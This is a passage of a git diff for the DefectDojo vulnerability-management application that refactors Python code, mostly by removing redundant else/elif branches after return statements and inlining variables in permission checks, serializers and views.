dojo/tools/php_security_audit_v2/parser.py | 7 +- .../php_symfony_security_check/parser.py | 2 +- dojo/tools/popeye/parser.py | 10 +- dojo/tools/pwn_sast/parser.py | 1 + dojo/tools/qualys/csv_parser.py | 8 +- dojo/tools/qualys/parser.py | 3 +- dojo/tools/qualys_infrascan_webgui/parser.py | 11 +- dojo/tools/qualys_webapp/parser.py | 6 +- dojo/tools/retirejs/parser.py | 4 +- dojo/tools/risk_recon/parser.py | 1 + dojo/tools/rusty_hog/parser.py | 5 +- dojo/tools/sarif/parser.py | 25 +-- dojo/tools/scout_suite/parser.py | 3 +- dojo/tools/semgrep/parser.py | 11 +- dojo/tools/snyk/parser.py | 6 +- dojo/tools/snyk_code/parser.py | 6 +- dojo/tools/sonarqube/parser.py | 27 +-- .../tools/sonarqube/sonarqube_restapi_json.py | 7 +- dojo/tools/sonarqube/soprasteria_helper.py | 17 +- dojo/tools/sonatype/parser.py | 7 +- dojo/tools/ssh_audit/parser.py | 9 +- dojo/tools/sslyze/parser.py | 7 +- dojo/tools/sslyze/parser_json.py | 8 +- dojo/tools/stackhawk/parser.py | 11 +- dojo/tools/sysdig_reports/parser.py | 5 +- dojo/tools/tenable/csv_format.py | 3 +- dojo/tools/tenable/parser.py | 7 +- dojo/tools/trivy/parser.py | 148 ++++++------ dojo/tools/trufflehog/parser.py | 8 +- dojo/tools/trustwave_fusion_api/parser.py | 7 +- dojo/tools/twistlock/parser.py | 20 +- dojo/tools/utils.py | 2 +- dojo/tools/vcg/parser.py | 19 +- dojo/tools/veracode/json_parser.py | 4 +- dojo/tools/veracode/parser.py | 7 +- dojo/tools/veracode/xml_parser.py | 3 +- dojo/tools/veracode_sca/parser.py | 9 +- dojo/tools/wapiti/parser.py | 3 +- dojo/tools/wfuzz/parser.py | 7 +- dojo/tools/whitehat_sentinel/parser.py | 4 +- dojo/tools/wiz/parser.py | 5 +- dojo/tools/xanitizer/parser.py | 5 +- dojo/tools/yarn_audit/parser.py | 7 +- dojo/user/utils.py | 29 +-- dojo/user/validators.py | 21 +- dojo/user/views.py | 11 +- dojo/utils.py | 77 +++---- ruff.toml | 1 + tests/product_test.py | 3 +- unittests/dojo_test_case.py | 15 +- unittests/test_apply_finding_template.py | 12 +- unittests/test_import_reimport.py | 7 +- unittests/test_rest_framework.py | 25 ++- .../tools/test_api_sonarqube_importer.py | 27 +-- unittests/tools/test_api_sonarqube_parser.py | 12 +- 205 files changed, 1438 insertions(+), 1929 deletions(-) diff --git a/dojo/announcement/views.py b/dojo/announcement/views.py index 6b0cb16bc3c..26160c3236b 100644 --- a/dojo/announcement/views.py +++ b/dojo/announcement/views.py @@ -81,12 +81,11 @@ def dismiss_announcement(request): extra_tags="alert-success", ) return HttpResponseRedirect("dashboard") - else: - messages.add_message( - request, - messages.ERROR, - _("Failed to remove announcement."), - extra_tags="alert-danger", - ) - return render(request, "dojo/dismiss_announcement.html") + messages.add_message( + request, + messages.ERROR, + _("Failed to remove announcement."), + extra_tags="alert-danger", + ) + return render(request, "dojo/dismiss_announcement.html") return render(request, "dojo/dismiss_announcement.html") diff --git a/dojo/api_v2/mixins.py b/dojo/api_v2/mixins.py index e32683c3742..6c6b4792757 100644 --- a/dojo/api_v2/mixins.py +++ b/dojo/api_v2/mixins.py @@ -29,8 +29,7 @@ def delete_preview(self, request, pk=None): def flatten(elem): if isinstance(elem, list): return itertools.chain.from_iterable(map(flatten, elem)) - else: - return [elem] + return [elem] rels = [ { diff --git a/dojo/api_v2/permissions.py b/dojo/api_v2/permissions.py index f7669826830..fe508c92b1b 100644 --- a/dojo/api_v2/permissions.py +++ b/dojo/api_v2/permissions.py @@ -35,8 +35,7 @@ def check_post_permission(request, post_model, post_pk, post_permission): raise ParseError(msg) object = get_object_or_404(post_model, pk=request.data.get(post_pk)) return user_has_permission(request.user, object, post_permission) - else: - return True + return True def check_object_permission( @@ -49,14 +48,13 @@ def check_object_permission( ): if request.method == "GET": return user_has_permission(request.user, object, get_permission) - elif request.method == "PUT" or request.method == "PATCH": + if request.method == "PUT" or request.method == "PATCH": return user_has_permission(request.user, object, put_permission) - elif request.method == "DELETE": + if request.method == "DELETE": return user_has_permission(request.user, object, delete_permission) - elif request.method == "POST": + if request.method == "POST": return user_has_permission(request.user, object, post_permission) - else: - return False + return False class UserHasAppAnalysisPermission(permissions.BasePermission): @@ -113,12 +111,11 @@ def has_permission(self, request, view): return user_has_configuration_permission( request.user, "auth.view_group", ) - elif request.method == "POST": + if request.method == "POST": return user_has_configuration_permission( request.user, "auth.add_group", ) - else: - return True + return True def has_object_permission(self, request, view, obj): if request.method == "GET": @@ -130,14 +127,13 @@ def has_object_permission(self, request, view, obj): ) and user_has_permission( request.user, obj, Permissions.Group_View, ) - else: - return check_object_permission( - request, - obj, - Permissions.Group_View, - Permissions.Group_Edit, - Permissions.Group_Delete, - ) + return check_object_permission( + request, + obj, + Permissions.Group_View, + Permissions.Group_Edit, + Permissions.Group_Delete, + ) class UserHasDojoGroupMemberPermission(permissions.BasePermission): @@ -188,8 +184,7 @@ def has_permission(self, request, view): ) ) return has_permission_result - else: - return True + return True def has_object_permission(self, request, view, obj): has_permission_result = True @@ -293,9 +288,8 @@ def has_permission(self, request, view): return check_post_permission( request, Product, "product", Permissions.Engagement_Add, ) - else: - # related object only need object permission - return True + # related object only need object permission + return True def has_object_permission(self, request, view, obj): if UserHasEngagementPermission.path_engagement_post.match( @@ -308,15 +302,14 @@ def has_object_permission(self, request, view, obj): Permissions.Engagement_Edit, Permissions.Engagement_Delete, ) - else: - return check_object_permission( - request, - obj, - Permissions.Engagement_View, - Permissions.Engagement_Edit, - Permissions.Engagement_Edit, - Permissions.Engagement_Edit, - ) + return check_object_permission( + request, + obj, + Permissions.Engagement_View, + Permissions.Engagement_Edit, + Permissions.Engagement_Edit, + Permissions.Engagement_Edit, + ) class UserHasRiskAcceptancePermission(permissions.BasePermission): @@ -334,9 +327,8 @@ def has_permission(self, request, view): return check_post_permission( request, Product, "product", Permissions.Risk_Acceptance, ) - else: - # related object only need object permission - return True + # related object only need object permission + return True def has_object_permission(self, request, view, obj): if UserHasRiskAcceptancePermission.path_risk_acceptance_post.match( @@ -351,15 +343,14 @@ def has_object_permission(self, request, view, obj): Permissions.Risk_Acceptance, Permissions.Risk_Acceptance, ) - else: - return check_object_permission( - request, - obj, - Permissions.Risk_Acceptance, - Permissions.Risk_Acceptance, - Permissions.Risk_Acceptance, - Permissions.Risk_Acceptance, - ) + return check_object_permission( + request, + obj, + Permissions.Risk_Acceptance, + Permissions.Risk_Acceptance, + Permissions.Risk_Acceptance, + Permissions.Risk_Acceptance, + ) class UserHasFindingPermission(permissions.BasePermission): @@ -382,9 +373,8 @@ def has_permission(self, request, view): return check_post_permission( request, Test, "test", Permissions.Finding_Add, ) - else: - # related object only need object permission - return True + # related object only need object permission + return True def has_object_permission(self, request, view, obj): if ( @@ -402,15 +392,14 @@ def has_object_permission(self, request, view, obj): Permissions.Finding_Edit, Permissions.Finding_Delete, ) - else: - return check_object_permission( - request, - obj, - Permissions.Finding_View, - Permissions.Finding_Edit, - Permissions.Finding_Edit, - Permissions.Finding_Edit, - ) + return check_object_permission( + request, + obj, + Permissions.Finding_View, + Permissions.Finding_Edit, + Permissions.Finding_Edit, + Permissions.Finding_Edit, + ) class UserHasImportPermission(permissions.BasePermission): @@ -435,7 +424,7 @@ def has_permission(self, request, view): return user_has_permission( request.user, engagement, Permissions.Import_Scan_Result, ) - elif engagement_id := converted_dict.get("engagement_id"): + if engagement_id := converted_dict.get("engagement_id"): # engagement_id doesn't exist msg = f'Engagement "{engagement_id}" does not exist' raise serializers.ValidationError(msg) @@ -452,19 +441,19 @@ def has_permission(self, request, view): converted_dict.get("product_type"), "Need engagement_id or product_name + engagement_name to perform import", ) - else: - # the engagement doesn't exist, so we need to check if the user has - # requested and is allowed to use auto_create - return check_auto_create_permission( - request.user, - converted_dict.get("product"), - converted_dict.get("product_name"), - converted_dict.get("engagement"), - converted_dict.get("engagement_name"), - converted_dict.get("product_type"), - converted_dict.get("product_type_name"), - "Need engagement_id or product_name + engagement_name to perform import", - ) + return None + # the engagement doesn't exist, so we need to check if the user has + # requested and is allowed to use auto_create + return check_auto_create_permission( + request.user, + converted_dict.get("product"), + converted_dict.get("product_name"), + converted_dict.get("engagement"), + converted_dict.get("engagement_name"), + converted_dict.get("product_type"), + converted_dict.get("product_type_name"), + "Need engagement_id or product_name + engagement_name to perform import", + ) class UserHasMetaImportPermission(permissions.BasePermission): @@ -490,13 +479,12 @@ def has_permission(self, request, view): return user_has_permission( request.user, product, Permissions.Import_Scan_Result, ) - elif product_id := converted_dict.get("product_id"): + if product_id := converted_dict.get("product_id"): # product_id doesn't exist msg = f'Product "{product_id}" does not exist' raise serializers.ValidationError(msg) - else: - msg = "Need product_id or product_name to perform import" - raise serializers.ValidationError(msg) + msg = "Need product_id or product_name to perform import" + raise serializers.ValidationError(msg) class UserHasProductPermission(permissions.BasePermission): @@ -556,8 +544,7 @@ def has_permission(self, request, view): return user_has_global_permission( request.user, Permissions.Product_Type_Add, ) - else: - return True + return True def has_object_permission(self, request, view, obj): return check_object_permission( @@ -631,7 +618,7 @@ def has_permission(self, request, view): return user_has_permission( request.user, test, Permissions.Import_Scan_Result, ) - elif test_id := converted_dict.get("test_id"): + if test_id := converted_dict.get("test_id"): # test_id doesn't exist msg = f'Test "{test_id}" does not exist' raise serializers.ValidationError(msg) @@ -648,19 +635,19 @@ def has_permission(self, request, view): converted_dict.get("product_type"), "Need test_id or product_name + engagement_name + scan_type to perform reimport", ) - else: - # the test doesn't exist, so we need to check if the user has - # requested and is allowed to use auto_create - return check_auto_create_permission( - request.user, - converted_dict.get("product"), - converted_dict.get("product_name"), - converted_dict.get("engagement"), - converted_dict.get("engagement_name"), - converted_dict.get("product_type"), - converted_dict.get("product_type_name"), - "Need test_id or product_name + engagement_name + scan_type to perform reimport", - ) + return None + # the test doesn't exist, so we need to check if the user has + # requested and is allowed to use auto_create + return check_auto_create_permission( + request.user, + converted_dict.get("product"), + converted_dict.get("product_name"), + converted_dict.get("engagement"), + converted_dict.get("engagement_name"), + converted_dict.get("product_type"), + converted_dict.get("product_type_name"), + "Need test_id or product_name + engagement_name + scan_type to perform reimport", + ) class UserHasTestPermission(permissions.BasePermission): @@ -676,9 +663,8 @@ def has_permission(self, request, view): return check_post_permission( request, Engagement, "engagement", Permissions.Test_Add, ) - else: - # related object only need object permission - return True + # related object only need object permission + return True def has_object_permission(self, request, view, obj): if UserHasTestPermission.path_tests_post.match( @@ -691,15 +677,14 @@ def has_object_permission(self, request, view, obj): Permissions.Test_Edit, Permissions.Test_Delete, ) - else: - return check_object_permission( - request, - obj, - Permissions.Test_View, - Permissions.Test_Edit, - Permissions.Test_Edit, - Permissions.Test_Edit, - ) + return check_object_permission( + request, + obj, + Permissions.Test_View, + Permissions.Test_Edit, + Permissions.Test_Edit, + Permissions.Test_Edit, + ) class UserHasTestImportPermission(permissions.BasePermission): @@ -776,8 +761,7 @@ def has_permission(self, request, view): ) ) return has_permission_result - else: - return True + return True def has_object_permission(self, request, view, obj): has_permission_result = True @@ -840,8 +824,7 @@ def has_permission(self, request, view): ) ) return has_permission_result - else: - return True + return True def has_object_permission(self, request, view, obj): has_permission_result = True @@ -934,9 +917,8 @@ def raise_no_auto_create_import_validation_error( if product_type_name: msg = f'Product "{product_name}" does not exist in Product_Type "{product_type_name}"' raise serializers.ValidationError(msg) - else: - msg = f'Product "{product_name}" does not exist' - raise serializers.ValidationError(msg) + msg = f'Product "{product_name}" does not exist' + raise serializers.ValidationError(msg) if engagement_name and not engagement: msg = f'Engagement "{engagement_name}" does not exist in Product "{product_name}"' @@ -1021,12 +1003,11 @@ def check_auto_create_permission( # new product type can be created with current user as owner, so # all objects in it can be created as well return True - else: - if not user_has_permission( - user, product_type, Permissions.Product_Type_Add_Product, - ): - msg = f'No permission to create products in product_type "{product_type}"' - raise PermissionDenied(msg) + if not user_has_permission( + user, product_type, Permissions.Product_Type_Add_Product, + ): + msg = f'No permission to create products in product_type "{product_type}"' + raise PermissionDenied(msg) # product can be created, so objects in it can be created as well return True diff --git a/dojo/api_v2/serializers.py b/dojo/api_v2/serializers.py index dc8acb40285..87ea0003d49 100644 --- a/dojo/api_v2/serializers.py +++ b/dojo/api_v2/serializers.py @@ -227,9 +227,7 @@ def to_internal_value(self, data): substrings = re.findall(r'(?:"[^"]*"|[^",]+)', s) data_safe.extend(substrings) - internal_value = tagulous.utils.render_tags(data_safe) - - return internal_value + return tagulous.utils.render_tags(data_safe) def to_representation(self, value): if not isinstance(value, list): @@ -305,8 +303,7 @@ def __str__(self): return json.dumps( self, sort_keys=True, indent=4, separators=(",", ": "), ) - else: - return json.dumps(self) + return json.dumps(self) class RequestResponseSerializerField(serializers.ListSerializer): @@ -556,8 +553,7 @@ def validate(self, data): ): msg = "Update of password though API is not allowed" raise ValidationError(msg) - else: - return super().validate(data) + return super().validate(data) class UserContactInfoSerializer(serializers.ModelSerializer): @@ -822,6 +818,7 @@ def validate(self, data): ) raise ValidationError(msg) return data + return None class RawFileSerializer(serializers.ModelSerializer): @@ -1074,8 +1071,7 @@ def to_representation(self, data): "title": file.title, }, ) - new_data = {"engagement_id": engagement.id, "files": new_files} - return new_data + return {"engagement_id": engagement.id, "files": new_files} class EngagementCheckListSerializer(serializers.ModelSerializer): @@ -1147,8 +1143,7 @@ def run_validators(self, initial_data): if "finding, endpoint must make a unique set" in str(exc): msg = "This endpoint-finding relation already exists" raise serializers.ValidationError(msg) from exc - else: - raise + raise def create(self, validated_data): endpoint = validated_data.get("endpoint") @@ -1161,8 +1156,7 @@ def create(self, validated_data): if "finding, endpoint must make a unique set" in str(ie): msg = "This endpoint-finding relation already exists" raise serializers.ValidationError(msg) - else: - raise + raise status.mitigated = validated_data.get("mitigated", False) status.false_positive = validated_data.get("false_positive", False) status.out_of_scope = validated_data.get("out_of_scope", False) @@ -1178,8 +1172,7 @@ def update(self, instance, validated_data): if "finding, endpoint must make a unique set" in str(ie): msg = "This endpoint-finding relation already exists" raise serializers.ValidationError(msg) - else: - raise + raise class EndpointSerializer(TaggitSerializer, serializers.ModelSerializer): @@ -1440,8 +1433,7 @@ def to_representation(self, data): "title": file.title, }, ) - new_data = {"test_id": test.id, "files": new_files} - return new_data + return {"test_id": test.id, "files": new_files} class TestImportFindingActionSerializer(serializers.ModelSerializer): @@ -1697,8 +1689,7 @@ def get_related_fields(self, obj): return FindingRelatedFieldsSerializer( required=False, ).to_representation(obj) - else: - return None + return None def get_display_status(self, obj) -> str: return obj.status() @@ -1742,8 +1733,7 @@ def update(self, instance, validated_data): # not sure why we are returning a tag_object, but don't want to change # too much now as we're just fixing a bug - tag_object = self._save_tags(instance, to_be_tagged) - return tag_object + return self._save_tags(instance, to_be_tagged) def validate(self, data): if self.context["request"].method == "PATCH": @@ -1879,8 +1869,7 @@ def create(self, validated_data): # not sure why we are returning a tag_object, but don't want to change # too much now as we're just fixing a bug - tag_object = self._save_tags(new_finding, to_be_tagged) - return tag_object + return self._save_tags(new_finding, to_be_tagged) def validate(self, data): if "reporter" not in data: @@ -2796,8 +2785,7 @@ def to_representation(self, data): "title": file.title, }, ) - new_data = {"finding_id": finding.id, "files": new_files} - return new_data + return {"finding_id": finding.id, "files": new_files} class FindingCloseSerializer(serializers.ModelSerializer): @@ -3054,10 +3042,9 @@ class QuestionnaireQuestionSerializer(serializers.ModelSerializer): def to_representation(self, instance): if isinstance(instance, TextQuestion): return TextQuestionSerializer(instance=instance).data - elif isinstance(instance, ChoiceQuestion): + if isinstance(instance, ChoiceQuestion): return ChoiceQuestionSerializer(instance=instance).data - else: - return QuestionSerializer(instance=instance).data + return QuestionSerializer(instance=instance).data class Meta: model = Question @@ -3094,10 +3081,9 @@ class QuestionnaireAnswerSerializer(serializers.ModelSerializer): def to_representation(self, instance): if isinstance(instance, TextAnswer): return TextAnswerSerializer(instance=instance).data - elif isinstance(instance, ChoiceAnswer): + if isinstance(instance, ChoiceAnswer): return ChoiceAnswerSerializer(instance=instance).data - else: - return AnswerSerializer(instance=instance).data + return AnswerSerializer(instance=instance).data class Meta: model = Answer @@ -3171,8 +3157,7 @@ def create(self, validated_data): if 'duplicate key value violates unique constraint "dojo_announcement_pkey"' in str(e): msg = "No more than one Announcement is allowed" raise serializers.ValidationError(msg) - else: - raise + raise class NotificationWebhooksSerializer(serializers.ModelSerializer): diff --git a/dojo/api_v2/views.py b/dojo/api_v2/views.py index 7ae9925479a..ae77e923553 100644 --- a/dojo/api_v2/views.py +++ b/dojo/api_v2/views.py @@ -879,8 +879,7 @@ def get_queryset(self): def get_serializer_class(self): if self.request and self.request.method == "POST": return serializers.FindingCreateSerializer - else: - return serializers.FindingSerializer + return serializers.FindingSerializer @extend_schema( methods=["POST"], @@ -1227,10 +1226,9 @@ def remove_tags(self, request, pk=None): {"success": "Tag(s) Removed"}, status=status.HTTP_204_NO_CONTENT, ) - else: - return Response( - delete_tags.errors, status=status.HTTP_400_BAD_REQUEST, - ) + return Response( + delete_tags.errors, status=status.HTTP_400_BAD_REQUEST, + ) @extend_schema( responses={ @@ -1368,10 +1366,9 @@ def _add_metadata(self, request, finding): ) return Response(data=metadata_data.data, status=status.HTTP_200_OK) - else: - return Response( - metadata_data.errors, status=status.HTTP_400_BAD_REQUEST, - ) + return Response( + metadata_data.errors, status=status.HTTP_400_BAD_REQUEST, + ) def _remove_metadata(self, request, finding): name = request.query_params.get("name", None) @@ -1458,13 +1455,13 @@ def metadata(self, request, pk=None): if request.method == "GET": return self._get_metadata(request, finding) - elif request.method == "POST": + if request.method == "POST": return self._add_metadata(request, finding) - elif request.method == "PUT": + if request.method == "PUT": return self._edit_metadata(request, finding) - elif request.method == "PATCH": + if request.method == "PATCH": return self._edit_metadata(request, finding) - elif request.method == "DELETE": + if request.method == "DELETE": return self._remove_metadata(request, finding) return Response( @@ -2092,8 +2089,7 @@ def get_queryset(self): def get_serializer_class(self): if self.request and self.request.method == "POST": return serializers.StubFindingCreateSerializer - else: - return serializers.StubFindingSerializer + return serializers.StubFindingSerializer # Authorization: authenticated, configuration @@ -2145,8 +2141,7 @@ def get_serializer_class(self): if self.action == "accept_risks": return ra_api.AcceptedRiskSerializer return serializers.TestCreateSerializer - else: - return serializers.TestSerializer + return serializers.TestSerializer @extend_schema( request=serializers.ReportGenerateOptionSerializer, diff --git a/dojo/apps.py b/dojo/apps.py index e7a39ab5433..fd3a06575fd 100644 --- a/dojo/apps.py +++ b/dojo/apps.py @@ -92,8 +92,7 @@ def get_model_fields_with_extra(model, extra_fields=()): def get_model_fields(default_fields, extra_fields=()): - combined = default_fields + extra_fields - return combined + return default_fields + extra_fields def get_model_default_fields(model): diff --git a/dojo/authorization/authorization.py b/dojo/authorization/authorization.py index a542d7c6e01..8f013b60061 100644 --- a/dojo/authorization/authorization.py +++ b/dojo/authorization/authorization.py @@ -66,7 +66,7 @@ def user_has_permission(user, obj, permission): if role_has_permission(product_type_group.role.id, permission): return True return False - elif ( + if ( isinstance(obj, Product) and permission.value >= Permissions.Product_View.value ): @@ -87,51 +87,51 @@ def user_has_permission(user, obj, permission): if role_has_permission(product_group.role.id, permission): return True return False - elif ( + if ( isinstance(obj, Engagement) and permission in Permissions.get_engagement_permissions() ): return user_has_permission(user, obj.product, permission) - elif ( + if ( isinstance(obj, Test) and permission in Permissions.get_test_permissions() ): return user_has_permission(user, obj.engagement.product, permission) - elif ( + if ( isinstance(obj, Finding) or isinstance(obj, Stub_Finding) ) and permission in Permissions.get_finding_permissions(): return user_has_permission( user, obj.test.engagement.product, permission, ) - elif ( + if ( isinstance(obj, Finding_Group) and permission in Permissions.get_finding_group_permissions() ): return user_has_permission( user, obj.test.engagement.product, permission, ) - elif ( + if ( isinstance(obj, Endpoint) and permission in Permissions.get_endpoint_permissions() ): return user_has_permission(user, obj.product, permission) - elif ( + if ( isinstance(obj, Languages) and permission in Permissions.get_language_permissions() ): return user_has_permission(user, obj.product, permission) - elif ( + if ( isinstance(obj, App_Analysis) and permission in Permissions.get_technology_permissions() ): return user_has_permission(user, obj.product, permission) - elif ( + if ( isinstance(obj, Product_API_Scan_Configuration) and permission in Permissions.get_product_api_scan_configuration_permissions() ): return user_has_permission(user, obj.product, permission) - elif ( + if ( isinstance(obj, Product_Type_Member) and permission in Permissions.get_product_type_member_permissions() ): @@ -140,9 +140,8 @@ def user_has_permission(user, obj, permission): return obj.user == user or user_has_permission( user, obj.product_type, permission, ) - else: - return user_has_permission(user, obj.product_type, permission) - elif ( + return user_has_permission(user, obj.product_type, permission) + if ( isinstance(obj, Product_Member) and permission in Permissions.get_product_member_permissions() ): @@ -151,19 +150,18 @@ def user_has_permission(user, obj, permission): return obj.user == user or user_has_permission( user, obj.product, permission, ) - else: - return user_has_permission(user, obj.product, permission) - elif ( + return user_has_permission(user, obj.product, permission) + if ( isinstance(obj, Product_Type_Group) and permission in Permissions.get_product_type_group_permissions() ): return user_has_permission(user, obj.product_type, permission) - elif ( + if ( isinstance(obj, Product_Group) and permission in Permissions.get_product_group_permissions() ): return user_has_permission(user, obj.product, permission) - elif ( + if ( isinstance(obj, Dojo_Group) and permission in Permissions.get_group_permissions() ): @@ -173,7 +171,7 @@ def user_has_permission(user, obj, permission): return group_member is not None and role_has_permission( group_member.role.id, permission, ) - elif ( + if ( isinstance(obj, Dojo_Group_Member) and permission in Permissions.get_group_member_permissions() ): @@ -182,9 +180,8 @@ def user_has_permission(user, obj, permission): return obj.user == user or user_has_permission( user, obj.group, permission, ) - else: - return user_has_permission(user, obj.group, permission) - elif ( + return user_has_permission(user, obj.group, permission) + if ( isinstance(obj, Cred_Mapping) and permission in Permissions.get_credential_permissions() ): @@ -202,9 +199,9 @@ def user_has_permission(user, obj, permission): return user_has_permission( user, obj.finding.test.engagement.product, permission, ) - else: - msg = f"No authorization implemented for class {type(obj).__name__} and permission {permission}" - raise NoAuthorizationImplementedError(msg) + return None + msg = f"No authorization implemented for class {type(obj).__name__} and permission {permission}" + raise NoAuthorizationImplementedError(msg) def user_has_global_permission(user, permission): diff --git a/dojo/cred/queries.py b/dojo/cred/queries.py index 4dd14385a06..28419772328 100644 --- a/dojo/cred/queries.py +++ b/dojo/cred/queries.py @@ -44,8 +44,6 @@ def get_authorized_cred_mappings(permission, queryset=None): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)) - cred_mappings = cred_mappings.filter( + return cred_mappings.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - - return cred_mappings diff --git a/dojo/cred/views.py b/dojo/cred/views.py index 31f923748b3..2fc373c3ac9 100644 --- a/dojo/cred/views.py +++ b/dojo/cred/views.py @@ -641,10 +641,8 @@ def delete_cred_controller(request, destination_url, id, ttid): if destination_url == "cred": return HttpResponseRedirect(reverse(destination_url)) - else: - return HttpResponseRedirect(reverse(destination_url, args=(id, ))) - else: - tform = CredMappingForm(instance=cred) + return HttpResponseRedirect(reverse(destination_url, args=(id, ))) + tform = CredMappingForm(instance=cred) add_breadcrumb(title="Delete Credential", top_level=False, request=request) product_tab = None diff --git a/dojo/decorators.py b/dojo/decorators.py index 129106c74de..b6902b8dc10 100644 --- a/dojo/decorators.py +++ b/dojo/decorators.py @@ -43,8 +43,7 @@ def __wrapper__(*args, **kwargs): countdown = kwargs.pop("countdown", 0) if we_want_async(*args, func=func, **kwargs): return func.apply_async(args=args, kwargs=kwargs, countdown=countdown) - else: - return func(*args, **kwargs) + return func(*args, **kwargs) return __wrapper__ @@ -78,8 +77,7 @@ def __wrapper__(*args, **kwargs): if _func is None: # decorator called without parameters return dojo_model_to_id_internal - else: - return dojo_model_to_id_internal(_func) + return dojo_model_to_id_internal(_func) # decorator with parameters needs another wrapper layer @@ -123,8 +121,7 @@ def __wrapper__(*args, **kwargs): if _func is None: # decorator called without parameters return dojo_model_from_id_internal - else: - return dojo_model_from_id_internal(_func) + return dojo_model_from_id_internal(_func) def get_parameter_froms_args_kwargs(args, kwargs, parameter): diff --git a/dojo/endpoint/queries.py b/dojo/endpoint/queries.py index 581feefc13b..684eeab7b1a 100644 --- a/dojo/endpoint/queries.py +++ b/dojo/endpoint/queries.py @@ -53,12 +53,10 @@ def get_authorized_endpoints(permission, queryset=None, user=None): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)) - endpoints = endpoints.filter( + return endpoints.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - return endpoints - def get_authorized_endpoint_status(permission, queryset=None, user=None): @@ -101,8 +99,6 @@ def get_authorized_endpoint_status(permission, queryset=None, user=None): endpoint__product__member=Exists(authorized_product_roles), endpoint__product__prod_type__authorized_group=Exists(authorized_product_type_groups), endpoint__product__authorized_group=Exists(authorized_product_groups)) - endpoint_status = endpoint_status.filter( + return endpoint_status.filter( Q(endpoint__product__prod_type__member=True) | Q(endpoint__product__member=True) | Q(endpoint__product__prod_type__authorized_group=True) | Q(endpoint__product__authorized_group=True)) - - return endpoint_status diff --git a/dojo/endpoint/utils.py b/dojo/endpoint/utils.py index be1c63fb0c0..d5c378e5e97 100644 --- a/dojo/endpoint/utils.py +++ b/dojo/endpoint/utils.py @@ -79,17 +79,16 @@ def endpoint_get_or_create(**kwargs): count = qs.count() if count == 0: return Endpoint.objects.get_or_create(**kwargs) - elif count == 1: - return qs.order_by("id").first(), False - else: - logger.warning( - f"Endpoints in your database are broken. " - f"Please access {reverse('endpoint_migrate')} and migrate them to new format or remove them.", - ) - # Get the oldest endpoint first, and return that instead - # a datetime is not captured on the endpoint model, so ID - # will have to work here instead + if count == 1: return qs.order_by("id").first(), False + logger.warning( + f"Endpoints in your database are broken. " + f"Please access {reverse('endpoint_migrate')} and migrate them to new format or remove them.", + ) + # Get the oldest endpoint first, and return that instead + # a datetime is not captured on the endpoint model, so ID + # will have to work here instead + return qs.order_by("id").first(), False def clean_hosts_run(apps, change): @@ -325,7 +324,7 @@ def endpoint_meta_import(file, product, create_endpoints, create_tags, create_me 'The column "hostname" must be present to map host to Endpoint.', extra_tags="alert-danger") return HttpResponseRedirect(reverse("import_endpoint_meta", args=(product.id, ))) - elif origin == "API": + if origin == "API": msg = 'The column "hostname" must be present to map host to Endpoint.' raise ValidationError(msg) @@ -361,14 +360,14 @@ def endpoint_meta_import(file, product, create_endpoints, create_tags, create_me for tag in existing_tags: if item[0] not in tag: continue - else: - # found existing. Update it - existing_tags.remove(tag) - break + # found existing. Update it + existing_tags.remove(tag) + break existing_tags += [item[0] + ":" + item[1]] # if tags are not supposed to be added, this value remain unchanged endpoint.tags = existing_tags endpoint.save() + return None def remove_broken_endpoint_statuses(apps): diff --git a/dojo/endpoint/views.py b/dojo/endpoint/views.py index 571f4989ec2..06ee7ac24a1 100644 --- a/dojo/endpoint/views.py +++ b/dojo/endpoint/views.py @@ -98,9 +98,8 @@ def get_endpoint_ids(endpoints): key = f"{e.host}-{e.product.id}" if key in hosts: continue - else: - hosts.append(key) - ids.append(e.id) + hosts.append(key) + ids.append(e.id) return ids @@ -307,8 +306,7 @@ def add_meta_data(request, eid): extra_tags="alert-success") if "add_another" in request.POST: return HttpResponseRedirect(reverse("add_endpoint_meta_data", args=(eid,))) - else: - return HttpResponseRedirect(reverse("view_endpoint", args=(eid,))) + return HttpResponseRedirect(reverse("view_endpoint", args=(eid,))) else: form = DojoMetaDataForm() diff --git a/dojo/engagement/queries.py b/dojo/engagement/queries.py index 9d8e9b6ae41..97eeb31bdfa 100644 --- a/dojo/engagement/queries.py +++ b/dojo/engagement/queries.py @@ -39,8 +39,6 @@ def get_authorized_engagements(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - engagements = engagements.filter( + return engagements.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - - return engagements diff --git a/dojo/engagement/views.py b/dojo/engagement/views.py index 777a5f7a118..d9d3cef0340 100644 --- a/dojo/engagement/views.py +++ b/dojo/engagement/views.py @@ -166,15 +166,13 @@ def get_filtered_engagements(request, view): filter_string_matching = get_system_setting("filter_string_matching", False) filter_class = EngagementDirectFilterWithoutObjectLookups if filter_string_matching else EngagementDirectFilter - engagements = filter_class(request.GET, queryset=engagements) - - return engagements + return filter_class(request.GET, queryset=engagements) def get_test_counts(engagements): # Get the test counts per engagement. As a separate query, this is much # faster than annotating the above `engagements` query. - engagement_test_counts = { + return { test["engagement"]: test["test_count"] for test in Test.objects.filter( engagement__in=engagements, @@ -184,7 +182,6 @@ def get_test_counts(engagements): test_count=Count("engagement"), ) } - return engagement_test_counts def engagements(request, view): @@ -304,9 +301,8 @@ def edit_engagement(request, eid): if "_Add Tests" in request.POST: return HttpResponseRedirect( reverse("add_tests", args=(engagement.id, ))) - else: - return HttpResponseRedirect( - reverse("view_engagement", args=(engagement.id, ))) + return HttpResponseRedirect( + reverse("view_engagement", args=(engagement.id, ))) else: logger.debug(form.errors) @@ -404,12 +400,11 @@ def copy_engagement(request, eid): recipients=[engagement.lead], icon="exclamation-triangle") return redirect_to_return_url_or_else(request, reverse("view_engagements", args=(product.id, ))) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to copy engagement, please try again.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Unable to copy engagement, please try again.", + extra_tags="alert-danger") product_tab = Product_Tab(product, title="Copy Engagement", 